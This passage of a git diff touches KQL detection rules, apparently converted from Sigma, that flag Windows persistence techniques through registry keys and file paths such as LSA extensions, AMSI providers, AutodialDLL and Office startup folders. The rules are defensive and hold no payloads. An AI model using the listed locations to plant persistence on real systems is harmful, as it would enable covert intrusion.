attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql index c3a246da..665e7534 100644 --- a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql +++ b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql @@ -1,11 +1,11 @@ -// Title: Potential Persistence Attempt Via ErrorHandler.Cmd -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-09 -// Level: medium -// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence -// The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. -// MITRE Tactic: Persistence -// Tags: attack.persistence - -DeviceFileEvents +// Title: Potential Persistence Attempt Via ErrorHandler.Cmd +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-09 +// Level: medium +// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence +// The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceFileEvents | where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql b/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql index 6b5a2e4b..fb66964c 100644 --- a/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql +++ b/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via AutodialDLL -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-10 -// Level: high -// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Potential Persistence Via AutodialDLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql b/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql index 3ea63ef9..c84b186a 100644 --- a/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql +++ b/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via CHM Helper DLL -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence -// MITRE Tactic: Persistence -// Tags: attack.persistence - -DeviceRegistryEvents +// Title: Potential Persistence Via CHM Helper DLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceRegistryEvents | where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql b/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql index 02f63428..9b799adf 100644 --- a/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql +++ b/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via Custom Protocol Handler -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-05-30 -// Level: medium -// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment. - -DeviceRegistryEvents +// Title: Potential Persistence Via Custom Protocol Handler +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-30 +// Level: medium +// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment. + +DeviceRegistryEvents | where (RegistryValueData startswith "URL:" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES*") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql index ff0b870a..fdb9d7c1 100644 --- a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql +++ b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql @@ -1,17 +1,17 @@ -// Title: Potential Persistence Via Disk Cleanup Handler - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: medium -// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. -// The disk cleanup manager is part of the operating system. It displays the dialog box […] -// The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. -// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. -// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. -// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Legitimate new entry added by windows - -DeviceRegistryEvents +// Title: Potential Persistence Via Disk Cleanup Handler - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. +// The disk cleanup manager is part of the operating system. It displays the dialog box […] +// The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. +// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. +// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. +// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate new entry added by windows + +DeviceRegistryEvents | where (ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith "\\Windows Upgrade Log Files"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql b/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql index 5ab794a6..47c8c3f1 100644 --- a/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql +++ b/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via DLLPathOverride -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process -// MITRE Tactic: Persistence -// Tags: attack.persistence - -DeviceRegistryEvents +// Title: Potential Persistence Via DLLPathOverride +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceRegistryEvents | where RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language*" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql b/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql index 9bf56e81..05844b1f 100644 --- a/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql +++ b/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via Event Viewer Events.asp -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-17 -// Level: medium -// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Potential Persistence Via Event Viewer Events.asp +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-17 +// Level: medium +// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql b/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql index 16167834..c76d6bf9 100644 --- a/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql +++ b/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via Excel Add-in - Registry -// Author: frack113 -// Date: 2023-01-15 -// Level: high -// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1137.006 - -DeviceRegistryEvents +// Title: Potential Persistence Via Excel Add-in - Registry +// Author: frack113 +// Date: 2023-01-15 +// Level: high +// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.006 + +DeviceRegistryEvents | where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Options" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql index 77025f5f..b86ff662 100644 --- a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql +++ b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql @@ -1,13 +1,13 @@ -// Title: Potential Persistence Via LSA Extensions -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. -// The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Potential Persistence Via LSA Extensions +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. +// The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql index 52afb24c..2730248f 100644 --- a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql +++ b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via Microsoft Office Add-In -// Author: NVISO -// Date: 2020-05-11 -// Level: high -// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1137.006 -// False Positives: -// - Legitimate add-ins - -DeviceFileEvents +// Title: Potential Persistence Via Microsoft Office Add-In +// Author: NVISO +// Date: 2020-05-11 +// Level: high +// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.006 +// False Positives: +// - Legitimate add-ins + +DeviceFileEvents | where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql index 5313eb2b..ec09b020 100644 --- a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql +++ b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql @@ -1,13 +1,13 @@ -// Title: Potential Persistence Via Microsoft Office Startup Folder -// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-02 -// Level: high -// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1137 -// False Positives: -// - Loading a user environment from a backup or a domain controller -// - Synchronization of templates - -DeviceFileEvents +// Title: Potential Persistence Via Microsoft Office Startup Folder +// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-02 +// Level: high +// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Loading a user environment from a backup or a domain controller +// - Synchronization of templates + +DeviceFileEvents | where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql b/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql index 0674aea0..f6314db4 100644 --- a/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql +++ b/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via Mpnotify -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way - -DeviceRegistryEvents +// Title: Potential Persistence Via Mpnotify +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way + +DeviceRegistryEvents | where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql b/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql index c7ae5b66..015717af 100644 --- a/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql +++ b/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via MyComputer Registry Keys -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-09 -// Level: high -// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for - -DeviceRegistryEvents +// Title: Potential Persistence Via MyComputer Registry Keys +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-09 +// Level: high +// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for + +DeviceRegistryEvents | where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql index c225fb44..7b921e94 100644 --- a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql +++ b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via New AMSI Providers - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Legitimate security products adding their own AMSI providers. Filter these according to your environment - -DeviceRegistryEvents +// Title: Potential Persistence Via New AMSI Providers - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate security products adding their own AMSI providers. Filter these according to your environment + +DeviceRegistryEvents | where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql b/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql index 5165e101..7350a916 100644 --- a/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql +++ b/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql @@ -1,13 +1,13 @@ -// Title: Potential Persistence Via Notepad++ Plugins -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-10 -// Level: medium -// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Possible FPs during first installation of Notepad++ -// - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities - -DeviceFileEvents +// Title: Potential Persistence Via Notepad++ Plugins +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-10 +// Level: medium +// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Possible FPs during first installation of Notepad++ +// - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities + +DeviceFileEvents | where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\npp." and InitiatingProcessFolderPath endswith ".exe" and (FolderPath in~ ("C:\\Program Files\\Notepad++\\plugins\\NppExport\\NppExport.dll", "C:\\Program Files\\Notepad++\\plugins\\mimeTools\\mimeTools.dll", "C:\\Program Files\\Notepad++\\plugins\\NppConverter\\NppConverter.dll", "C:\\Program Files\\Notepad++\\plugins\\Config\\nppPluginList.dll")))))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql b/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql index 13afbc05..47dd212e 100644 --- a/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql +++ b/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via Outlook Form -// Author: Tobias Michalski (Nextron Systems) -// Date: 2021-06-10 -// Level: high -// Description: Detects the creation of a new Outlook form which can contain malicious code -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1137.003 -// False Positives: -// - Legitimate use of outlook forms - -DeviceFileEvents +// Title: Potential Persistence Via Outlook Form +// Author: Tobias Michalski (Nextron Systems) +// Date: 2021-06-10 +// Level: high +// Description: Detects the creation of a new Outlook form which can contain malicious code +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.003 +// False Positives: +// - Legitimate use of outlook forms + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql b/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql index b561b52f..519f52b7 100644 --- a/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql +++ b/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via TypedPaths -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-22 -// Level: high -// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Potential Persistence Via TypedPaths +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: high +// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql b/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql index 53e07333..a9a51619 100644 --- a/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql +++ b/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via Visual Studio Tools for Office -// Author: Bhabesh Raj -// Date: 2021-01-10 -// Level: medium -// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. -// MITRE Tactic: Persistence -// Tags: attack.t1137.006, attack.persistence -// False Positives: -// - Legitimate Addin Installation - -DeviceRegistryEvents +// Title: Potential Persistence Via Visual Studio Tools for Office +// Author: Bhabesh Raj +// Date: 2021-01-10 +// Level: medium +// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. +// MITRE Tactic: Persistence +// Tags: attack.t1137.006, attack.persistence +// False Positives: +// - Legitimate Addin Installation + +DeviceRegistryEvents | where (RegistryKey endswith "\\Software\\Microsoft\\Office\\Outlook\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Word\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Excel\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Powerpoint\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\VSTO\\Security\\Inclusion*") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\Integrator.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program 